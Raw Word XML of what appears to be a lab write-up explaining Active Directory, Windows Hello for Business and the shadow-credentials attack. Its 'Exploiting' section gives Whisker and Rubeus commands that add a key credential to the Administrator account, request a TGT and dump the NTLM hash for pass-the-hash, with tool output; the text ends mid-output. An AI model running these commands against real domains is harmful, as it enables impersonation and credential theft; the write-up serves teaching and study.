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9EE5" w14:textId="7EF925ED" w:rsidR="00C173B3" w:rsidRPr="00976565" w:rsidRDefault="00762437">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00976565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is an Active Directory?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEEE057" w14:textId="5E687CE5" w:rsidR="00762437" w:rsidRDefault="00762437">
      <w:r>
        <w:t xml:space="preserve">Active Directory (AD) is a system mainly used by businesses in Windows Environments. It’s a centralised authentication system. The Domain Controller (DC) is at the heart of AD and typically </w:t>
      </w:r>
      <w:r w:rsidR="00FD3991">
        <w:t>manages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data storage, </w:t>
      </w:r>
      <w:r w:rsidR="00FD3991">
        <w:t>authentication,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and authorisation within a domain.</w:t>
      </w:r>
      <w:r w:rsidR="00FD3991">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA9E314" w14:textId="19EF30CC" w:rsidR="00F66984" w:rsidRDefault="00F66984">
      <w:r>
        <w:t>Image AD as a digital database containing objects like users, groups, and computers, each with specific attributes and permissions. Ideally, it applies the principles of least privilege and uses a hierarchical approach to managing roles and giving authenticated users access to all non-sensitive data throughout the system. For this reason, assigning permissions to users must be approached cautiously, as it can potentially compromise the entire Active Directory/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36207FF0" w14:textId="5F6702BB" w:rsidR="00FD3991" w:rsidRPr="00F55B12" w:rsidRDefault="00417FA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F55B12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is Windows Hell for Business?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E59F7E" w14:textId="097EAD09" w:rsidR="00D03C01" w:rsidRDefault="00B0236E">
      <w:r>
        <w:t>MS introduced Windows Hello for Business (WHFB) as a modern and secure way to replace conventional password-based authentication.</w:t>
      </w:r>
      <w:r w:rsidR="006E7B36">
        <w:t xml:space="preserve"> Instead of relying on traditional passwords, WHFB utilises cryptographic keys for user verification. Users on the AD domain can access the AD using </w:t>
      </w:r>
      <w:r w:rsidR="00D03C01">
        <w:t>PIN or biometrics</w:t>
      </w:r>
      <w:r w:rsidR="005E1FF0">
        <w:t xml:space="preserve"> connected to a pair of cryptographic keys: public and private.</w:t>
      </w:r>
      <w:r w:rsidR="00D03C01">
        <w:t xml:space="preserve"> Those keys help to prove the identity of the entity to which they belong. The ‘msDS-KeyCredentialLink’ is an attribute used by the Domain Controller to store the public key in WHFB for enrolling a new user device (such as a computer). In short, each user object in the AD database will have its public key stored in this unique attribut</w:t>
      </w:r>
      <w:r w:rsidR="005B3BD8">
        <w:t>e.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B00D9D" w14:textId="77777777" w:rsidR="008C2F9C" w:rsidRPr="008C2F9C" w:rsidRDefault="008C2F9C" w:rsidP="008C2F9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AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2F9C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Here's the procedure to store a new pair of certificates with WHfB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3107226B" w14:textId="77777777" w:rsidR="008C2F9C" w:rsidRPr="008C2F9C" w:rsidRDefault="008C2F9C" w:rsidP="008C2F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8C2F9C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Trusted Platform Module (TPM) public-private key pair generation: The TPM creates a public-private key pair for the user's account when they enrol. It's crucial to remember that the private key never leaves the TPM and is never disclosed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C0294D" w14:textId="77777777" w:rsidR="008C2F9C" w:rsidRPr="008C2F9C" w:rsidRDefault="008C2F9C" w:rsidP="008C2F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kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2F9C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Client certificate request: The client initiates a certificate request to receive a trustworthy certificate. The organisation's certificate issuing authority (CA) receives this request and provides a valid certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD6548" w14:textId="58EE8016" w:rsidR="008C2F9C" w:rsidRPr="008C2F9C" w:rsidRDefault="008C2F9C" w:rsidP="008C2F9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8C2F9C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Key storage: The user account's </w:t>
      </w:r>
      <w:r w:rsidR="00AF1B71">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2F9C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msDS-KeyCredentialLink</w:t>
      </w:r>
      <w:r w:rsidR="00AF1B71">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2F9C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute will be set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFD5573" w14:textId="77777777" w:rsidR="00502683" w:rsidRPr="00AF1B71" w:rsidRDefault="00502683" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F96511" w14:textId="77777777" w:rsidR="00AF1B71" w:rsidRPr="00AF1B71" w:rsidRDefault="00AF1B71" w:rsidP="00AF1B7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AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF1B71">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Authentication Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A6E1F7" w14:textId="7AB1C84E" w:rsidR="00AF1B71" w:rsidRPr="00AF1B71" w:rsidRDefault="00AF1B71" w:rsidP="00AF1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F1B71">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorisation: The Domain Controller decrypts the client's pre-authentication data using the raw public key stored in the </w:t>
      </w:r>
      <w:r w:rsidR="008839AB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1B71">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msDS-KeyCredentialLink</w:t>
      </w:r>
      <w:r w:rsidR="008839AB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1B71">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute of the user's account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0137A1B2" w14:textId="77777777" w:rsidR="00AF1B71" w:rsidRPr="00AF1B71" w:rsidRDefault="00AF1B71" w:rsidP="00AF1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F1B71">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Certificate generation: The certificate is created for the user by the Domain Controller and can be sent back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E42CF6D" w14:textId="77777777" w:rsidR="00AF1B71" w:rsidRPr="00AF1B71" w:rsidRDefault="00AF1B71" w:rsidP="00AF1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AF1B71">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Authentication: After that, the client can log in to the Active Directory domain using the certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A946B" w14:textId="5D49E9F4" w:rsidR="00502683" w:rsidRPr="003E2FFE" w:rsidRDefault="00117344" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E2FFE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1A4278" w14:textId="6B164599" w:rsidR="00117344" w:rsidRDefault="00117344" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A good tool for abusing the vulnerable privilege is Whisker, which is a C# utility.</w:t>
      </w:r>
      <w:r w:rsidR="002A3350">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once you identify the vulnerable user, you can run the add command from Whisker to simulate the enrolment of malicious device, updating the ‘msDS-KeyCredentialsLink attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D40A6FF" w14:textId="59A6EFA5" w:rsidR="00AC7534" w:rsidRPr="00AF1B71" w:rsidRDefault="00AC7534" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E2FFE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: ‘.\Whisker.exe add /target:Administrator’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5065FB" w14:textId="77777777" w:rsidR="00502683" w:rsidRPr="00AF1B71" w:rsidRDefault="00502683" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5395DB36" w14:textId="79B3D347" w:rsidR="00502683" w:rsidRPr="00445983" w:rsidRDefault="005423F5" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445983">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9788D6" w14:textId="77777777" w:rsidR="005423F5" w:rsidRPr="005423F5" w:rsidRDefault="005423F5" w:rsidP="0054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AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005423F5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[*] You can now run Rubeus with the following syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F03BFA1" w14:textId="77777777" w:rsidR="00B0576C" w:rsidRPr="00B0576C" w:rsidRDefault="005423F5" w:rsidP="00B0576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</w:pPr>
      <w:r w:rsidRPr="00B0576C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 xml:space="preserve">Rubeus.exe asktgt /user:Administrator </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349FCCD9" w14:textId="77777777" w:rsidR="00B0576C" w:rsidRDefault="00B0576C" w:rsidP="0054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</w:pPr>
    </w:p>
    <w:p w14:paraId="79271151" w14:textId="7F171C26" w:rsidR="00B0576C" w:rsidRPr="00B0576C" w:rsidRDefault="005423F5" w:rsidP="00B0576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</w:pPr>
      <w:r w:rsidRPr="00B0576C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 xml:space="preserve">/certificate:MIIJwAIBAzCCCXwGCSqGSIb3DQEHAaCCCW0EgglpMIIJZTCCBhYGCSqGSIb3DQEHAaCCBgcEggYDMIIF/zCCBfsGCyqGSIb[snip] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B7968A" w14:textId="77777777" w:rsidR="00B0576C" w:rsidRDefault="00B0576C" w:rsidP="0054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</w:pPr>
    </w:p>
    <w:p w14:paraId="06693BE8" w14:textId="6AD05772" w:rsidR="005423F5" w:rsidRPr="00B0576C" w:rsidRDefault="005423F5" w:rsidP="00B0576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</w:pPr>
      <w:r w:rsidRPr="00B0576C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t>/password:"qfyNlIfCjVqzwh1e" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD608E" w14:textId="77777777" w:rsidR="005423F5" w:rsidRPr="005423F5" w:rsidRDefault="005423F5" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14207482" w14:textId="39E057E8" w:rsidR="00502683" w:rsidRPr="00B245BE" w:rsidRDefault="00DA7C97" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The output will provide the certificate necessary to authenticate the impersonation of the vulnerable user with a command read to be launched using Rubeus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7B4432" w14:textId="53AC92CC" w:rsidR="00502683" w:rsidRDefault="00C21CC9" w:rsidP="00D91F5E">
      <w:r>
        <w:t>The core idea behind the authentication in AD is using the Kerberos protocol, which provides tokens (TGT) for each user. A TGT can be seen as a session token that avoids the credentials prompt after the user authenticates.</w:t>
      </w:r>
      <w:r w:rsidR="00B245BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E1BB6E" w14:textId="5CAACA7D" w:rsidR="00B245BE" w:rsidRDefault="00E76629" w:rsidP="00D91F5E">
      <w:r>
        <w:t>Once you have obtained the certificate, you can acquire a valid TGT and impersonate the vulnerable user. Additionally, the NTLM hash of the user account can be displayed in the console output, which can be used for a pass-the-hash attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A21BF" w14:textId="77777777" w:rsidR="00502683" w:rsidRDefault="00502683" w:rsidP="00D91F5E"/>
    <w:p w14:paraId="33987467" w14:textId="77777777" w:rsidR="00C47AB5" w:rsidRPr="00C47AB5" w:rsidRDefault="00C47AB5" w:rsidP="00C47AB5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C47AB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is Rebeus?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB67532" w14:textId="77777777" w:rsidR="00C47AB5" w:rsidRDefault="00C47AB5" w:rsidP="00C47AB5">
      <w:r>
        <w:t xml:space="preserve">It is a C# toolset designed for direct Kerberos interaction and exploitation, a pass-the-hash attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DDBB41" w14:textId="77777777" w:rsidR="002A2A2F" w:rsidRPr="002A2A2F" w:rsidRDefault="00914697" w:rsidP="002A2A2F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: .\Rubeus.exe asktgt /user:administrator </w:t>
      </w:r>
      <w:r w:rsidRPr="00D066B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001312DE" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001312DE" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">MIIJwAIBAzCCCXwGCSqGSIb3DQEHAaCCCW0EgglpMIIJZTCCBhYGCSqGSIb3DQEHAaCCBgcEggYDMIIF/zCCBfsGCyqGSIb[snip] </w:t>
      </w:r>
      <w:r w:rsidR="002A2A2F" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="002A2A2F" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="002A2A2F" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:"qfyNlIfCjVqzwh1e" /</w:t>
      </w:r>
      <w:r w:rsidR="002A2A2F" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>domain</w:t>
      </w:r>
      <w:r w:rsidR="002A2A2F" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:AOC.local /</w:t>
      </w:r>
      <w:r w:rsidR="002A2A2F" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dc</w:t>
      </w:r>
      <w:r w:rsidR="002A2A2F" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">:southpole.AOC.local </w:t>
      </w:r>
      <w:r w:rsidR="002A2A2F" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/getcredentials</w:t>
      </w:r>
      <w:r w:rsidR="002A2A2F" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A2A2F" w:rsidRPr="002A2A2F">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7877A397" w14:textId="4265A0AD" w:rsidR="001312DE" w:rsidRPr="002A2A2F" w:rsidRDefault="001312DE" w:rsidP="00131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</w:pPr>
    </w:p>
    <w:p w14:paraId="2F514D31" w14:textId="518E4962" w:rsidR="00914697" w:rsidRPr="00CB6CCF" w:rsidRDefault="006B3814" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB6CCF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028DC098" w14:textId="77777777" w:rsidR="006B3814" w:rsidRPr="006B3814" w:rsidRDefault="006B3814" w:rsidP="006B3814">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3814">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[*] Getting credentials using U2U</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13223D8B" w14:textId="77777777" w:rsidR="006B3814" w:rsidRPr="006B3814" w:rsidRDefault="006B3814" w:rsidP="006B3814">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239FCB6D" w14:textId="77777777" w:rsidR="006B3814" w:rsidRPr="006B3814" w:rsidRDefault="006B3814" w:rsidP="006B3814">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3814">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  CredentialInfo         :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444BDB7B" w14:textId="77777777" w:rsidR="006B3814" w:rsidRPr="006B3814" w:rsidRDefault="006B3814" w:rsidP="006B3814">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3814">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    Version              : 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2FD115" w14:textId="77777777" w:rsidR="006B3814" w:rsidRPr="006B3814" w:rsidRDefault="006B3814" w:rsidP="006B3814">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3814">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    EncryptionType       : rc4_hmac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E74CC7A" w14:textId="77777777" w:rsidR="006B3814" w:rsidRPr="006B3814" w:rsidRDefault="006B3814" w:rsidP="006B3814">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3814">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
